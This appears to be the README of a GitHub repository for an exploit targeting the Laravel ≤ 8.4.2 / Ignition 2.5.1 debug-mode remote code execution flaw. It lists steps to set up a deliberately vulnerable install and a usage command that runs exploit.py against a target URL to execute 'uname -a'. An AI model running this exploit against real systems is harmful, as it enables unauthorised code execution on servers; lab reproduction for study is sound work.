Skip to content

Latest commit

 

History

History
21 lines (17 loc) · 457 Bytes

README.md

File metadata and controls

21 lines (17 loc) · 457 Bytes

laravel-8.4.2-rce

Setup enviroment

git clone https://github.com/laravel/laravel.git
cd laravel
git checkout e849812
composer install
composer require facade/ignition==2.5.1
php artisan serve

Usage

python3 exploit.py http://pwnme.me:8000 /var/www/html/laravel/storage/logs/laravel.log 'uname -a'

References

Laravel <= v8.4.2 debug mode RCE